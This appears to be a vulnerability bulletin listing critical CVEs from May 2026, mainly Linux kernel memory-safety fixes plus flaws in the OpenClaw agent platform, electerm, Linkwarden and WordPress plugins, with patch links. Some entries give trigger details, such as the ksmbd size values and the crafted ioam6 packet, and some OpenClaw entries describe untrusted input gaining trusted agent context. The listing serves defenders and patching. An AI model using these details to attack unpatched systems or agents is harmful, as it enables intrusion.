2026-05-06 | 9.4 | CVE-2026-43114 | https://git.kernel.org/stable/c/fa4f1f52528c73989d820f32bfca06bec5afeece https://git.kernel.org/stable/c/3d53f9aafd469ae1ea27051e00f5b96ca1b55d52 https://git.kernel.org/stable/c/07de44424bb7f17ef9357e8535df96d9e97c40cb https://git.kernel.org/stable/c/0abbc43f71d99baadeeba6fa3fe1c80b676f57ed https://git.kernel.org/stable/c/d3c0037ffe1273fa1961e779ff6906234d6cf53c |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: btrfs: tracepoints: get correct superblock from dentry in event btrfs_sync_file() If overlay is used on top of btrfs, dentry->d_sb translates to overlay's super block and fsid assignment will lead to a crash. Use file_inode(file)->i_sb to always get btrfs_sb. | 2026-05-06 | 9.1 | CVE-2026-43117 | https://git.kernel.org/stable/c/c09a7446aab5773f38d6abb25fce99b8e1dfbc97 https://git.kernel.org/stable/c/32372781d664a9b03c40343e96c29d0a6139f97d https://git.kernel.org/stable/c/2e4adfaec97ee053ad1bdfb5036845e66f7e0d8a https://git.kernel.org/stable/c/d110d7cdb045715c0b45b0dfd974525bb38f653d https://git.kernel.org/stable/c/a85b46db143fda5869e7d8df8f258ccef5fa1719 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: dlm: validate length in dlm_search_rsb_tree The len parameter in dlm_dump_rsb_name() is not validated and comes from network messages. When it exceeds DLM_RESNAME_MAXLEN, it can cause out-of-bounds write in dlm_search_rsb_tree(). Add length validation to prevent potential buffer overflow. | 2026-05-06 | 9.8 | CVE-2026-43125 | https://git.kernel.org/stable/c/67288113c5e6cf9e659b4065c0ed6f16100e0c71 https://git.kernel.org/stable/c/082083c9fbd99422a0370fe2102144a231c9f5d6 https://git.kernel.org/stable/c/5f053a2e7209d326cbbc07738fa6d6893d307438 https://git.kernel.org/stable/c/080e5563f878c64e697b89e7439d730d0daad882 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ksmbd: fix signededness bug in smb_direct_prepare_negotiation() smb_direct_prepare_negotiation() casts an unsigned __u32 value from sp->max_recv_size and req->preferred_send_size to a signed int before computing min_t(int, ...). A maliciously provided preferred_send_size of 0x80000000 will return as smaller than max_recv_size, and then be used to set the maximum allowed alowed receive size for the next message. By sending a second message with a large value (>1420 bytes) the attacker can then achieve a heap buffer overflow. This fix replaces min_t(int, ...) with min_t(u32) | 2026-05-06 | 9.8 | CVE-2026-43185 | https://git.kernel.org/stable/c/ceae058eb707ddd0d68f0872f9d9f23b7c30c37b https://git.kernel.org/stable/c/55abc475d096da4a5356b6efb0cfdc6156bc1550 https://git.kernel.org/stable/c/6b4f875aac344cdd52a1f34cc70ed2f874a65757 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ipv6: ioam: fix heap buffer overflow in __ioam6_fill_trace_data() On the receive path, __ioam6_fill_trace_data() uses trace->nodelen to decide how much data to write for each node. It trusts this field as-is from the incoming packet, with no consistency check against trace->type (the 24-bit field that tells which data items are present). A crafted packet can set nodelen=0 while setting type bits 0-21, causing the function to write ~100 bytes past the allocated region (into skb_shared_info), which corrupts adjacent heap memory and leads to a kernel panic. Add a shared helper ioam6_trace_compute_nodelen() in ioam6.c to derive the expected nodelen from the type field, and use it: - in ioam6_iptunnel.c (send path, existing validation) to replace the open-coded computation; - in exthdrs.c (receive path, ipv6_hop_ioam) to drop packets whose nodelen is inconsistent with the type field, before any data is written. Per RFC 9197, bits 12-21 are each short (4-octet) fields, so they are included in IOAM6_MASK_SHORT_FIELDS (changed from 0xff100000 to 0xff1ffc00). | 2026-05-06 | 9.8 | CVE-2026-43186 | https://git.kernel.org/stable/c/f4d9d4b8fd839719d564651671e24c62c545c23b https://git.kernel.org/stable/c/fb3c662fafebc5b9d74417ed1de8759f6bb72143 https://git.kernel.org/stable/c/632d233cf2e64a46865ae2c064ae3c9df7c8864f https://git.kernel.org/stable/c/0591d6509c2ff13f09ea2998434aba0c0472e978 https://git.kernel.org/stable/c/e90346a2f1e8917d5760a44a1f61c44e3b36d96b https://git.kernel.org/stable/c/ea3632aefc04205436868541638e26f4a74d5637 https://git.kernel.org/stable/c/6db8b56eed62baacaf37486e83378a72635c04cc |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: netconsole: avoid OOB reads, msg is not nul-terminated msg passed to netconsole from the console subsystem is not guaranteed to be nul-terminated. Before recent commit 7eab73b18630 ("netconsole: convert to NBCON console infrastructure") the message would be placed in printk_shared_pbufs, a static global buffer, so KASAN had harder time catching OOB accesses. Now we see: printk: console [netcon_ext0] enabled BUG: KASAN: slab-out-of-bounds in string+0x1f7/0x240 Read of size 1 at addr ffff88813b6d4c00 by task pr/netcon_ext0/594 CPU: 65 UID: 0 PID: 594 Comm: pr/netcon_ext0 Not tainted 6.19.0-11754-g4246fd6547c9 Call Trace: kasan_report+0xe4/0x120 string+0x1f7/0x240 vsnprintf+0x655/0xba0 scnprintf+0xba/0x120 netconsole_write+0x3fe/0xa10 nbcon_emit_next_record+0x46e/0x860 nbcon_kthread_func+0x623/0x750 Allocated by task 1: nbcon_alloc+0x1ea/0x450 register_console+0x26b/0xe10 init_netconsole+0xbb0/0xda0 The buggy address belongs to the object at ffff88813b6d4000 which belongs to the cache kmalloc-4k of size 4096 The buggy address is located 0 bytes to the right of allocated 3072-byte region [ffff88813b6d4000, ffff88813b6d4c00) | 2026-05-06 | 9.1 | CVE-2026-43197 | https://git.kernel.org/stable/c/3126a2f98beaec5a554a1fb31c46db1e8542665e https://git.kernel.org/stable/c/74ab1456eaa3b2eb986138f9e1f4cb37e73b6f58 https://git.kernel.org/stable/c/82aec772fca2223bc5774bd9af486fd95766e578 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: tcp: fix potential race in tcp_v6_syn_recv_sock() Code in tcp_v6_syn_recv_sock() after the call to tcp_v4_syn_recv_sock() is done too late. After tcp_v4_syn_recv_sock(), the child socket is already visible from TCP ehash table and other cpus might use it. Since newinet->pinet6 is still pointing to the listener ipv6_pinfo bad things can happen as syzbot found. Move the problematic code in tcp_v6_mapped_child_init() and call this new helper from tcp_v4_syn_recv_sock() before the ehash insertion. This allows the removal of one tcp_sync_mss(), since tcp_v4_syn_recv_sock() will call it with the correct context. | 2026-05-06 | 9.8 | CVE-2026-43198 | https://git.kernel.org/stable/c/fe89b2f05b854847784f91127319172945c1fadd https://git.kernel.org/stable/c/7178e2a8027423b2af17ab95df73a749a5b72e5b https://git.kernel.org/stable/c/858d2a4f67ff69e645a43487ef7ea7f28f06deae |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net: do not pass flow_id to set_rps_cpu() Blamed commit made the assumption that the RPS table for each receive queue would have the same size, and that it would not change. Compute flow_id in set_rps_cpu(), do not assume we can use the value computed by get_rps_cpu(). Otherwise we risk out-of-bound access and/or crashes. | 2026-05-06 | 9.8 | CVE-2026-43208 | https://git.kernel.org/stable/c/5455a232edea6b946b99449f15ca771a8874a5a6 https://git.kernel.org/stable/c/ed712dc0d64dee5f0d05e4d8ca57711f8a9c850c https://git.kernel.org/stable/c/8a8a9fac9efa6423fd74938b940cb7d731780718 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: libceph: define and enforce CEPH_MAX_KEY_LEN When decoding the key, verify that the key material would fit into a fixed-size buffer in process_auth_done() and generally has a sane length. The new CEPH_MAX_KEY_LEN check replaces the existing check for a key with no key material which is a) not universal since CEPH_CRYPTO_NONE has to be excluded and b) doesn't provide much value since a smaller than needed key is just as invalid as no key -- this has to be handled elsewhere anyway. | 2026-05-08 | 9.8 | CVE-2026-43304 | https://git.kernel.org/stable/c/6405e8c680974bb74e2c98d5249fb52c7b12a6c6 https://git.kernel.org/stable/c/8d745d38c88ecbed95f6b2b39857bf89f35a3244 https://git.kernel.org/stable/c/e1dc45d97975f9db65694d234fbddf1915176e16 https://git.kernel.org/stable/c/1b275bd49e58752efb83767a5d1aed41356c5e64 https://git.kernel.org/stable/c/c1a0f5f1e5e7e98c36a362ec3d1fcfd9932931ed https://git.kernel.org/stable/c/d82467c07b03a27c3c5469b62bb3b726305a80bb https://git.kernel.org/stable/c/ac431d597a9bdfc2ba6b314813f29a6ef2b4a3bf |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net/ipv6: ioam6: prevent schema length wraparound in trace fill ioam6_fill_trace_data() stores the schema contribution to the trace length in a u8. With bit 22 enabled and the largest schema payload, sclen becomes 1 + 1020 / 4, wraps from 256 to 0, and bypasses the remaining-space check. __ioam6_fill_trace_data() then positions the write cursor without reserving the schema area but still copies the 4-byte schema header and the full schema payload, overrunning the trace buffer. Keep sclen in an unsigned int so the remaining-space check and the write cursor calculation both see the full schema length. | 2026-05-08 | 9.8 | CVE-2026-43341 | https://git.kernel.org/stable/c/e96d48b37708d53cbdc47f6f60b0714fc4a5f596 https://git.kernel.org/stable/c/d1b041080086e91d3733a5438a8c51ad5d3d8e09 https://git.kernel.org/stable/c/77695a69baca9b99d95fad09fc78c2318736604f https://git.kernel.org/stable/c/184d2e9db27c0f76226b5cad16fe29510a5d2280 https://git.kernel.org/stable/c/d6e1c9b02d85a4f1f4ba6d68e916d9b610a3ed7d https://git.kernel.org/stable/c/5e67ba9bb531e1ec6599a82a065dea9040b9ce50 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ksmbd: fix use-after-free by using call_rcu() for oplock_info ksmbd currently frees oplock_info immediately using kfree(), even though it is accessed under RCU read-side critical sections in places like opinfo_get() and proc_show_files(). Since there is no RCU grace period delay between nullifying the pointer and freeing the memory, a reader can still access oplock_info structure after it has been freed. This can leads to a use-after-free especially in opinfo_get() where atomic_inc_not_zero() is called on already freed memory. Fix this by switching to deferred freeing using call_rcu(). | 2026-05-08 | 9.8 | CVE-2026-43376 | https://git.kernel.org/stable/c/302fef75512b2c8329a3f5efab1ae7ba2562387a https://git.kernel.org/stable/c/08aa9f3c8cf4d0bee44df540dfe34e8d64069f2c https://git.kernel.org/stable/c/1d6abf145615dbfe267ce3b0a271f95e3780e18e https://git.kernel.org/stable/c/ce8507ee82c888126d8e7565e27c016308d24cde https://git.kernel.org/stable/c/1dfd062caa165ec9d7ee0823087930f3ab8a6294 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ksmbd: fix use-after-free in smb_lazy_parent_lease_break_close() opinfo pointer obtained via rcu_dereference(fp->f_opinfo) is being accessed after rcu_read_unlock() has been called. This creates a race condition where the memory could be freed by a concurrent writer between the unlock and the subsequent pointer dereferences (opinfo->is_lease, etc.), leading to a use-after-free. | 2026-05-08 | 9.8 | CVE-2026-43379 | https://git.kernel.org/stable/c/bf4d66d72e4a9e268c1012c331ce9eaedb5e2086 https://git.kernel.org/stable/c/960699317d39f46611f4ebeb69edc567c1f4e6b6 https://git.kernel.org/stable/c/dbbd328cf58261ca239756fe1c0d10c9518d3399 https://git.kernel.org/stable/c/b3568347c51c46e2cabc356bc34676df98296619 https://git.kernel.org/stable/c/eac3361e3d5dd8067b3258c69615888eb45e9f25 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net/tcp-md5: Fix MAC comparison to be constant-time To prevent timing attacks, MACs need to be compared in constant time. Use the appropriate helper function for this. | 2026-05-08 | 9.4 | CVE-2026-43383 | https://git.kernel.org/stable/c/821c8751fdeecdeecabeb11704dd33439c9e4bbc https://git.kernel.org/stable/c/345a9530756528d7ca407663d659c3c40e75c3dd https://git.kernel.org/stable/c/5d305a95130a8d08b9545e47f1e18d29d59866cb https://git.kernel.org/stable/c/02669e2a4d207068edce7e8b5fafd85822018ce6 https://git.kernel.org/stable/c/ae3831b44f477de048287493e184fc3ff913b624 https://git.kernel.org/stable/c/b502e97e29d791ff7a8051f29a414535739be218 https://git.kernel.org/stable/c/46d0d6f50dab706637f4c18a470aac20a21900d3 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net/tcp-ao: Fix MAC comparison to be constant-time To prevent timing attacks, MACs need to be compared in constant time. Use the appropriate helper function for this. | 2026-05-08 | 9.8 | CVE-2026-43384 | https://git.kernel.org/stable/c/8be6ed64966da48b6c4726918f106c18742a5125 https://git.kernel.org/stable/c/a269cbdc442f8658bca35383e34b9d0b0ff95a1c https://git.kernel.org/stable/c/080b0e210088296dd50d6637c06c1db14246adfe https://git.kernel.org/stable/c/67edfec516d30d3e62925c397be4a1e5185802fc |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: kthread: consolidate kthread exit paths to prevent use-after-free Guillaume reported crashes via corrupted RCU callback function pointers during KUnit testing. The crash was traced back to the pidfs rhashtable conversion which replaced the 24-byte rb_node with an 8-byte rhash_head in struct pid, shrinking it from 160 to 144 bytes. struct kthread (without CONFIG_BLK_CGROUP) is also 144 bytes. With CONFIG_SLAB_MERGE_DEFAULT and SLAB_HWCACHE_ALIGN both round up to 192 bytes and share the same slab cache. struct pid.rcu.func and struct kthread.affinity_node both sit at offset 0x78. When a kthread exits via make_task_dead() it bypasses kthread_exit() and misses the affinity_node cleanup. free_kthread_struct() frees the memory while the node is still linked into the global kthread_affinity_list. A subsequent list_del() by another kthread writes through dangling list pointers into the freed and reused memory, corrupting the pid's rcu.func pointer. Instead of patching free_kthread_struct() to handle the missed cleanup, consolidate all kthread exit paths. Turn kthread_exit() into a macro that calls do_exit() and add kthread_do_exit() which is called from do_exit() for any task with PF_KTHREAD set. This guarantees that kthread-specific cleanup always happens regardless of the exit path - make_task_dead(), direct do_exit(), or kthread_exit(). Replace __to_kthread() with a new tsk_is_kthread() accessor in the public header. Export do_exit() since module code using the kthread_exit() macro now needs it directly. | 2026-05-08 | 9.8 | CVE-2026-43402 | https://git.kernel.org/stable/c/4729c7b00a347fd37d0cbc265b85f2884c3e06b6 https://git.kernel.org/stable/c/5a591d7a5e48d30100943940a30a6ab41b15c672 https://git.kernel.org/stable/c/28aaa9c39945b7925a1cc1d513c8f21ed38f5e4f |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: libceph: prevent potential out-of-bounds reads in process_message_header() If the message frame is (maliciously) corrupted in a way that the length of the control segment ends up being less than the size of the message header or a different frame is made to look like a message frame, out-of-bounds reads may ensue in process_message_header(). Perform an explicit bounds check before decoding the message header. | 2026-05-08 | 9.1 | CVE-2026-43406 | https://git.kernel.org/stable/c/76ccf21a12c5f6d6790bc32c7da82446d877b2f4 https://git.kernel.org/stable/c/75582aaa580c11aed4c7731cad6b068b700e7efb https://git.kernel.org/stable/c/50156622eb0888e62541d715a98584480a1bc7cb https://git.kernel.org/stable/c/dbd857a9e1e33ea71eaf3e211877027e533770d1 https://git.kernel.org/stable/c/69fe5af33fa3806f398d21c081d73c66e5523bc2 https://git.kernel.org/stable/c/035867ae6f18df0aeedb2a57a5b74091bd4e3fe8 https://git.kernel.org/stable/c/69fb5d91bba44ecf7eb80530b85fa4fb028921d5 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: libceph: Fix potential out-of-bounds access in ceph_handle_auth_reply() This patch fixes an out-of-bounds access in ceph_handle_auth_reply() that can be triggered by a message of type CEPH_MSG_AUTH_REPLY. In ceph_handle_auth_reply(), the value of the payload_len field of such a message is stored in a variable of type int. A value greater than INT_MAX leads to an integer overflow and is interpreted as a negative value. This leads to decrementing the pointer address by this value and subsequently accessing it because ceph_decode_need() only checks that the memory access does not exceed the end address of the allocation. This patch fixes the issue by changing the data type of payload_len to u32. Additionally, the data type of result_msg_len is changed to u32, as it is also a variable holding a non-negative length. Also, an additional layer of sanity checks is introduced, ensuring that directly after reading it from the message, payload_len and result_msg_len are not greater than the overall segment length. BUG: KASAN: slab-out-of-bounds in ceph_handle_auth_reply+0x642/0x7a0 [libceph] Read of size 4 at addr ffff88811404df14 by task kworker/20:1/262 CPU: 20 UID: 0 PID: 262 Comm: kworker/20:1 Not tainted 6.19.2 #5 PREEMPT(voluntary) Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.16.3-debian-1.16.3-2 04/01/2014 Workqueue: ceph-msgr ceph_con_workfn [libceph] Call Trace: <TASK> dump_stack_lvl+0x76/0xa0 print_report+0xd1/0x620 ? __pfx__raw_spin_lock_irqsave+0x10/0x10 ? kasan_complete_mode_report_info+0x72/0x210 kasan_report+0xe7/0x130 ? ceph_handle_auth_reply+0x642/0x7a0 [libceph] ? ceph_handle_auth_reply+0x642/0x7a0 [libceph] __asan_report_load_n_noabort+0xf/0x20 ceph_handle_auth_reply+0x642/0x7a0 [libceph] mon_dispatch+0x973/0x23d0 [libceph] ? apparmor_socket_recvmsg+0x6b/0xa0 ? __pfx_mon_dispatch+0x10/0x10 [libceph] ? __kasan_check_write+0x14/0x30i ? mutex_unlock+0x7f/0xd0 ? __pfx_mutex_unlock+0x10/0x10 ? __pfx_do_recvmsg+0x10/0x10 [libceph] ceph_con_process_message+0x1f1/0x650 [libceph] process_message+0x1e/0x450 [libceph] ceph_con_v2_try_read+0x2e48/0x6c80 [libceph] ? __pfx_ceph_con_v2_try_read+0x10/0x10 [libceph] ? save_fpregs_to_fpstate+0xb0/0x230 ? raw_spin_rq_unlock+0x17/0xa0 ? finish_task_switch.isra.0+0x13b/0x760 ? __switch_to+0x385/0xda0 ? __kasan_check_write+0x14/0x30 ? mutex_lock+0x8d/0xe0 ? __pfx_mutex_lock+0x10/0x10 ceph_con_workfn+0x248/0x10c0 [libceph] process_one_work+0x629/0xf80 ? __kasan_check_write+0x14/0x30 worker_thread+0x87f/0x1570 ? __pfx__raw_spin_lock_irqsave+0x10/0x10 ? __pfx_try_to_wake_up+0x10/0x10 ? kasan_print_address_stack_frame+0x1f7/0x280 ? __pfx_worker_thread+0x10/0x10 kthread+0x396/0x830 ? __pfx__raw_spin_lock_irq+0x10/0x10 ? __pfx_kthread+0x10/0x10 ? __kasan_check_write+0x14/0x30 ? recalc_sigpending+0x180/0x210 ? __pfx_kthread+0x10/0x10 ret_from_fork+0x3f7/0x610 ? __pfx_ret_from_fork+0x10/0x10 ? __switch_to+0x385/0xda0 ? __pfx_kthread+0x10/0x10 ret_from_fork_asm+0x1a/0x30 </TASK> [ idryomov: replace if statements with ceph_decode_need() for payload_len and result_msg_len ] | 2026-05-08 | 9.1 | CVE-2026-43407 | https://git.kernel.org/stable/c/ea080b21092590122c3f971cf588932cdbf47847 https://git.kernel.org/stable/c/edc678e5cd11730a2834b43071d8923f05bc334d https://git.kernel.org/stable/c/6cee34d6669fe176b4259131adb1a145c939b472 https://git.kernel.org/stable/c/8bb87547e92dcf0928ed763c60e0ac8d733c3656 https://git.kernel.org/stable/c/ed024d2f4c79c0eb2464df0fb640610ac301f9a0 https://git.kernel.org/stable/c/f9da5c1bbac5c8e33259fe00ed7347438fffa969 https://git.kernel.org/stable/c/9f9e2297f45fc2d2524eb104c289d69ddef95665 https://git.kernel.org/stable/c/b282c43ed156ae15ea76748fc15cd5c39dc9ab72 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: scsi: qla2xxx: Completely fix fcport double free In qla24xx_els_dcmd_iocb() sp->free is set to qla2x00_els_dcmd_sp_free(). When an error happens, this function is called by qla2x00_sp_release(), when kref_put() releases the first and the last reference. qla2x00_els_dcmd_sp_free() frees fcport by calling qla2x00_free_fcport(). Doing it one more time after kref_put() is a bad idea. | 2026-05-08 | 9.8 | CVE-2026-43414 | https://git.kernel.org/stable/c/d48ea85463f5b34f7b92ea0a13eddf1ab993da7b https://git.kernel.org/stable/c/c0b7da13a04bd70ef6070bfb9ea85f582294560a |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net/mlx5e: RX, Fix XDP multi-buf frag counting for striding RQ XDP multi-buf programs can modify the layout of the XDP buffer when the program calls bpf_xdp_pull_data() or bpf_xdp_adjust_tail(). The referenced commit in the fixes tag corrected the assumption in the mlx5 driver that the XDP buffer layout doesn't change during a program execution. However, this fix introduced another issue: the dropped fragments still need to be counted on the driver side to avoid page fragment reference counting issues. The issue was discovered by the drivers/net/xdp.py selftest, more specifically the test_xdp_native_tx_mb: - The mlx5 driver allocates a page_pool page and initializes it with a frag counter of 64 (pp_ref_count=64) and the internal frag counter to 0. - The test sends one packet with no payload. - On RX (mlx5e_skb_from_cqe_mpwrq_nonlinear()), mlx5 configures the XDP buffer with the packet data starting in the first fragment which is the page mentioned above. - The XDP program runs and calls bpf_xdp_pull_data() which moves the header into the linear part of the XDP buffer. As the packet doesn't contain more data, the program drops the tail fragment since it no longer contains any payload (pp_ref_count=63). - mlx5 device skips counting this fragment. Internal frag counter remains 0. - mlx5 releases all 64 fragments of the page but page pp_ref_count is 63 => negative reference counting error. Resulting splat during the test: WARNING: CPU: 0 PID: 188225 at ./include/net/page_pool/helpers.h:297 mlx5e_page_release_fragmented.isra.0+0xbd/0xe0 [mlx5_core] Modules linked in: [...] CPU: 0 UID: 0 PID: 188225 Comm: ip Not tainted 6.18.0-rc7_for_upstream_min_debug_2025_12_08_11_44 #1 NONE Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS rel-1.13.0-0-gf21b5a4aeb02-prebuilt.qemu.org 04/01/2014 RIP: 0010:mlx5e_page_release_fragmented.isra.0+0xbd/0xe0 [mlx5_core] [...] Call Trace: <TASK> mlx5e_free_rx_mpwqe+0x20a/0x250 [mlx5_core] mlx5e_dealloc_rx_mpwqe+0x37/0xb0 [mlx5_core] mlx5e_free_rx_descs+0x11a/0x170 [mlx5_core] mlx5e_close_rq+0x78/0xa0 [mlx5_core] mlx5e_close_queues+0x46/0x2a0 [mlx5_core] mlx5e_close_channel+0x24/0x90 [mlx5_core] mlx5e_close_channels+0x5d/0xf0 [mlx5_core] mlx5e_safe_switch_params+0x2ec/0x380 [mlx5_core] mlx5e_change_mtu+0x11d/0x490 [mlx5_core] mlx5e_change_nic_mtu+0x19/0x30 [mlx5_core] netif_set_mtu_ext+0xfc/0x240 do_setlink.isra.0+0x226/0x1100 rtnl_newlink+0x7a9/0xba0 rtnetlink_rcv_msg+0x220/0x3c0 netlink_rcv_skb+0x4b/0xf0 netlink_unicast+0x255/0x380 netlink_sendmsg+0x1f3/0x420 __sock_sendmsg+0x38/0x60 ____sys_sendmsg+0x1e8/0x240 ___sys_sendmsg+0x7c/0xb0 [...] __sys_sendmsg+0x5f/0xb0 do_syscall_64+0x55/0xc70 The problem applies for XDP_PASS as well which is handled in a different code path in the driver. This patch fixes the issue by doing page frag counting on all the original XDP buffer fragments for all relevant XDP actions (XDP_TX , XDP_REDIRECT and XDP_PASS). This is basically reverting to the original counting before the commit in the fixes tag. As frag_page is still pointing to the original tail, the nr_frags parameter to xdp_update_skb_frags_info() needs to be calculated in a different way to reflect the new nr_frags. | 2026-05-08 | 9.8 | CVE-2026-43465 | https://git.kernel.org/stable/c/7d7342a18fadcdb70a63b3c930dc63528ce51832 https://git.kernel.org/stable/c/043bd62f748bc9fd98154037aa598cffbd3c667c https://git.kernel.org/stable/c/db25c42c2e1f9c0d136420fff5e5700f7e771a6f |
| OpenClaw--OpenClaw | OpenClaw before 2026.4.10 contains an input validation vulnerability that allows external hook metadata to be enqueued as trusted system events. Attackers can supply malicious hook names to escalate untrusted input into higher-trust agent context. | 2026-05-05 | 9.1 | CVE-2026-43534 | GitHub Security Advisory (GHSA-7g8c-cfr3-vqqr) Patch Commit VulnCheck Advisory: OpenClaw < 2026.4.10 - Unsanitized External Input in Agent Hook Events |
| OpenClaw--OpenClaw | OpenClaw versions 2026.4.7 before 2026.4.14 contain a privilege escalation vulnerability where heartbeat owner downgrade logic skips webhook wake events carrying untrusted content. Attackers can exploit this by sending untrusted webhook wake events to preserve owner-like execution context when the run should have been downgraded. | 2026-05-05 | 9.1 | CVE-2026-43566 | GitHub Security Advisory (GHSA-g2hm-779g-vm32) Patch Commit VulnCheck Advisory: OpenClaw 2026.4.7 < 2026.4.14 - Privilege Escalation via Untrusted Webhook Wake Events |
| OpenClaw--OpenClaw | OpenClaw versions 2026.2.21 before 2026.4.10 contain an authentication bypass vulnerability in the sandbox noVNC helper route that exposes interactive browser session credentials. Attackers can access the noVNC helper route without bridge authentication to gain unauthorized access to the interactive browser session. | 2026-05-06 | 9.8 | CVE-2026-43575 | GitHub Security Advisory (GHSA-92jp-89mq-4374) Patch Commit VulnCheck Advisory: OpenClaw 2026.2.21 < 2026.4.10 - Authentication Bypass in Sandbox noVNC Helper Route |
| OpenClaw--OpenClaw | OpenClaw versions 2026.3.31 before 2026.4.10 contain a privilege escalation vulnerability where heartbeat owner downgrade detection misses local background async exec completion events. Attackers can exploit this by providing untrusted completion content to leave a run in a more privileged context than intended. | 2026-05-06 | 9.1 | CVE-2026-43578 | GitHub Security Advisory (GHSA-g375-h3v6-4873) Patch Commit VulnCheck Advisory: OpenClaw 2026.3.31 < 2026.4.10 - Privilege Escalation via Missed Async Exec Completion Events in Heartbeat Owner Downgrade |
| OpenClaw--OpenClaw | OpenClaw before 2026.4.10 contains an improper network binding vulnerability in the sandbox browser CDP relay that exposes Chrome DevTools Protocol on 0.0.0.0. Attackers can access the DevTools protocol outside intended local sandbox boundaries by exploiting the overly broad binding configuration. | 2026-05-06 | 9.6 | CVE-2026-43581 | GitHub Security Advisory (GHSA-525j-hqq2-66r4) Patch Commit VulnCheck Advisory: OpenClaw < 2026.4.10 - Chrome DevTools Protocol Exposure via Overly Broad CDP Relay Binding |
| electerm--electerm | electerm is an open-sourced terminal/ssh/sftp/telnet/serialport/RDP/VNC/Spice/ftp client. In versions 3.8.15 and prior, Electerm's terminal hyperlink handler passes any URL clicked in the terminal directly to shell.openExternal without any protocol validation. An attacker who controls terminal output (e.g., via a malicious SSH server, compromised remote host, or malicious plugin rendering terminal content) can thus achieve arbitrary code execution or local file access on the victim's machine, requiring only that the victim clicks a displayed link. At time of publication, there are no publicly available patches. | 2026-05-08 | 9.6 | CVE-2026-43941 | https://github.com/electerm/electerm/security/advisories/GHSA-fwf6-j56g-m97c |
| OpenClaw--OpenClaw | OpenClaw before 2026.4.15 contains an authentication bypass vulnerability in Feishu webhook and card-action validation that allows unauthenticated requests to reach command dispatch. Missing encryptKey configuration and blank callback tokens fail open instead of rejecting requests, enabling attackers to bypass signature verification and replay protection to execute arbitrary commands. | 2026-05-06 | 9.8 | CVE-2026-44109 | GitHub Security Advisory (GHSA-xh72-v6v9-mwhc) Patch Commit VulnCheck Advisory: OpenClaw < 2026.4.15 - Authentication Bypass in Feishu Webhook and Card-Action Validation |
| linkwarden--linkwarden | Linkwarden is a self-hosted, open-source collaborative bookmark manager to collect, organize and archive webpages. Prior to version 2.13.0, a Server-Side Request Forgery (SSRF) vulnerability in the fetchTitleAndHeaders function allows authenticated users to make arbitrary HTTP requests to internal services due to insufficient URL validation that only checks for "http://" or "https://" prefixes. This issue has been patched in version 2.13.0. | 2026-05-08 | 9.1 | CVE-2026-44313 | https://github.com/linkwarden/linkwarden/security/advisories/GHSA-5qpc-x7rv-hvmp |
| ahmadgb--GeekyBot AI Copilot, Chatbot, WooCommerce Lead Gen & Zero-Prompt Content | The Geeky Bot plugin for WordPress is vulnerable to Missing Authorization in versions up to, and including, 1.2.2. This is due to a nopriv AJAX route allowing attacker-controlled model/function dispatch and reaching a plugin installer helper that downloads and unzips attacker-supplied ZIP files into wp-content/plugins/. This makes it possible for unauthenticated attackers to perform arbitrary plugin installation and achieve remote code execution. | 2026-05-05 | 9.8 | CVE-2026-5294 | https://www.wordfence.com/threat-intel/vulnerabilities/id/a1817c58-e807-4ef2-a382-28ca2fd5239e?source=cve https://plugins.trac.wordpress.org/changeset/3497169/geeky-bot |
| MoreConvert--MoreConvert Pro | The MoreConvert Pro plugin for WordPress is vulnerable to Authentication Bypass in all versions up to, and including, 1.9.14. This is due to the guest waitlist verification flow not invalidating or regenerating verification tokens when the customer email address is changed. This makes it possible for unauthenticated attackers to authenticate as existing users, including administrators, by obtaining a valid guest verification token for an attacker-controlled email, changing the same guest customer email to the target account email through the public waitlist flow, and then using the original verification link. | 2026-05-05 | 9.8 | CVE-2026-5722 | https://www.wordfence.com/threat-intel/vulnerabilities/id/fe887475-f7e8-4fda-a793-bc6f37b70f3e?source=cve https://wordpress.org/plugins/smart-wishlist-for-more-convert/ https://moreconvert.com/changelog/ |
| TUBITAK BILGEM Software Technologies Research Institute--Liderahenk | Origin Validation Error vulnerability in TUBITAK BILGEM Software Technologies Research Institute Liderahenk allows Accessing Functionality Not Properly Constrained by ACLs. This issue affects Liderahenk: from 2.0.1 before 2.0.2. | 2026-05-07 | 9.8 | CVE-2026-6508 | https://siberguvenlik.gov.tr/guvenlik-bildirimleri/detay/tr-26-0181 |
| DivvyDrive Information Technologies Inc.--DivvyDrive | URL redirection to untrusted site ('open redirect') vulnerability in DivvyDrive Information Technologies Inc. DivvyDrive allows Parameter Injection. This issue affects DivvyDrive: from 4.8.2.9 before 4.8.3.2. | 2026-05-07 | 9.6 | CVE-2026-6795 | https://siberguvenlik.gov.tr/guvenlik-bildirimleri/detay/tr-26-0182 |
| GeoVision Inc.--GV-IP Device Utility | An insufficient encryption vulnerability exists in the Device Authentication functionality of GeoVision GV-IP Device Utility 9.0.5. Listening to broadcast packets can lead to credentials leak. An attacker can listen to broadcast messages to trigger this vulnerability. When interacting with various Geovision devices on the network, the utility may send privileged commands; in order to do so, the username and password of the device need to be provided. In some instances the command is broadcasted over UDP and the username/password are encrypted using a cryptographic protocol that appears to be derivated from Blowfish. However the symmetric key used for the encryption is also included in the packet, and thus the security of the username/password only relies on the "obscurity" of the encryption scheme. An attacker on the same LAN can listen to the broadcast traffic once an admin user interacts with the device, and decrypt the credentials using their own implementation of the algorithm. With this password the attacker would have full control over the device configuration, allowing them to change its ip address or even reset it to factory default. | 2026-05-04 | 9.3 | CVE-2026-7161 | https://www.geovision.com.tw/cyber_security.php 